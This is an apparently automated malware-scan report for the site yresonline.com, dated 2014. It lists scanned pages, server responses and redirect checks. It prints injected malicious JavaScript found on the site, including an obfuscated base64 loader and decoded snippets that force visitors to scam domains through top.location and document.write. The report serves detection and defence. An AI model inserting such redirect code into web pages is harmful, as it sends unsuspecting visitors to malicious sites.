Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yresonline.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yresonline.com/ | HTTP/1.1 200 OK Date: Fri, 19 Dec 2014 17:39:21 GMT Accept-Ranges: bytes ETag: "f052a1a1ffdca1:11ba77" Server: Microsoft-IIS/6.0 Content-Length: 3243 Content-Location: http://yresonline.com/default.html Content-Type: text/html Last-Modified: Wed, 26 May 2010 22:02:15 GMT X-Powered-By: ASP.NET | clean |
http://yresonline.com/default.html | 200 OK Content-Length: 3243 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: antiviruse-shop.ru
top.location = 'http://antiviruse-shop.ru/';
Decoded script:
function () { function bI() { } hJ = ""; var kVQ = "kVQ"; var iG = ""; var eBS = new Array; rA = ""; wE.w(); jY = ""; var hB = "hB"; var iZF = ""; qY = ""; jYG = ""; uK = 30969; var qD = "qD"; }
/*** called setTimeout with function () { function bI() { } hJ = ""; var kVQ = "kVQ"; var iG = ""; var eBS = new Array; rA = ""; wE.w(); jY = ""; var hB = "hB"; var iZF = ""; qY = ""; jYG = ""; uK = 30969; var qD = "qD"; }, 326 */
<html ><head ></head><body ></body></html>
http://yresonline.com/test404page.js | 200 OK Content-Length: 24043 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var CRYPT={signature:'BXcfTYewQ',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(e ...[1647 bytes skipped]...
Decoded script:
document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');
document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');
/*** called setTimeout with document['w9107r9701i6175t2669e92805853'.replace(/[0-9]/g,'')]('<scr'+hVhGWcCBqW+'ipt>top.location=\'http://joycerer.com/red4.php\';</scr'+hVhGWcCBqW+'ipt>');, 273 */
top.location='http://joycerer.com/red4.php';
Antivirus reports:
http://m.welcomeperutravel.com/contact/smfolder.php | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://m.welcomeperutravel.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://m.welcomeperutravel.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yresonline.com
Result:
HTTP/1.1 200 OK
Date: Fri, 19 Dec 2014 17:39:21 GMT
Accept-Ranges: bytes
ETag: "f052a1a1ffdca1:11ba77"
Server: Microsoft-IIS/6.0
Content-Length: 3243
Content-Location: http://yresonline.com/default.html
Content-Type: text/html
Last-Modified: Wed, 26 May 2010 22:02:15 GMT
X-Powered-By: ASP.NET
...3243 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yresonline.com
Referer: http://www.google.com/search?q=yresonline.com
Result:
The result is similar to the first query. There are no suspicious redirects found.